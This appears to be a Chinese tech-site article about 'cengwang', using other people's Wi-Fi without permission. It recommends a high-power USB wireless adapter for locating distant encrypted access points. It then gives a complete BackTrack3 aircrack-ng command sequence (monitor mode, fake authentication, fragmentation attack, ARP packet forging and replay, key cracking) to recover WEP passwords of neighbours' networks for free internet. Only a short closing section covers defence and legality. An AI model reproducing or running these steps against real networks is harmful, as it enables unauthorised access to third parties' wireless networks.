扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
信号增强问题
首先,我们必须让自己“蹭网”成功的概率高些。那么提高接入点数量就成了首要问题。一般情况下,笔记本内置的无线网卡在搜寻接入点时会偏弱于外部无线网卡,另外天线问题也是一个很关键的因素,我们来看看“蹭网”族使用的无线网卡。
卡皇实物
在国内某家网站宣传的其“卡皇”产品,声称发射功率达500mw,是普通网卡的10倍,其可视传输距离为3600米,也就是半径3600米内的接入点都会被搜索到,不管该接入点是否加密。如果你住在居民区,那周围的写字楼,商场,批发市场,住宅小区,咖啡厅包含的接入点将和你家中无线路由器发出的无线信号一样,都被这款卡皇嗅探到。
外置天线
我们来看看这款设备有何特殊之处:采用RTL8187L芯片,功率更强,信号接收多。完美支持BT3(这个后面会讲到),可外接天线,网上售价为260元,考虑到可以常年免费上网,这个价格也不算太离谱。
搜索到无线信号以后,我们会发现大部分接入点都是加密的,接下来就需要配合软件方式破解密码,达到免费无线上网的目的。
BackTrack3(BT3)破解密码
BackTrack是基于SLAX的自启动运行光盘,是基于linux发行版的系统。目前使用最多的是V3 Final版本,但这个版本对少数网卡支持存在一些问题,所以V3 Beta版本仍有部分人在使用。BackTrack集中了无线网络几乎能见到的安全和破解工具,可谓无线网络破解的百宝箱,全球各地的人使用它破解了无数的无线网络,从侧面促进了大众无线网络安全意识的迅速提高。
BackTrack3
由于我们需要在BT3下破解,而使用的是Windows系统,所以需要在虚拟机下安装BT3CD版。安装系统类型选择Linux,空间需要大于4GB,具体安装过程与其他系统并无两样,下面主要讲解一下进入系统后的破解工作。
打开终端窗口,输入以下命令(括号内为解释内容):
ifconfig -a (查看无线网卡Mac地址)
airmon-ng start wifi0 5
(其中wifi0是电脑里面给无线网卡的,一般都是这个,用ifconfig -a命令可以看得到。wifi0 后面的5是需要破解AP频道,可以在左下角开始菜单里面,找到第二项Internet中的无线网工具,查看AP的频道Channel。然后会看到出现一个 Ath1,格式为XXX1样式)
airodump-ng --ivs -w name -c 5 ath1 (5和ath1根据自己的结果修改)
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 (XX内容为MAC地址)
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp (XX是网卡MAC地址,XXXXX-XXXXXX就是上次命令返回的文件名)
aireplay-ng -2 -r mrarp -x 1024 ath1
打开一个新的窗口,运行
aircrack-ng -n 64 -b ap_mac name-XX.ivs(name-XX.ivs需要到桌面生成文件夹里查看,找到序号最大的那个)
一般情况下,用不了太久,密码就会显示出来,当然只局限于破解WEP加密方式。
防范与总结
首先最好杜绝WEP加密方式,另外最好的办法就是在无线路由器上采取MAC绑定,对准入MAC进行白名单处理,不过这种方法不太适合公用场合的AP,但换一种加密方法还是比较容易的。
设置准入设备防止蹭网者连接无线网络
对于无线破解来说并不复杂,掌握了基本的方法后破解效率觉得称得上高效,不过随着上网资费的下调,蹭网情况会越来越少,加之卡皇设备功率大,辐射也不容小视,并且从法律的角度也是不允许这种行为的。希望广大网友提高警惕,保护好自己的无线网络。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者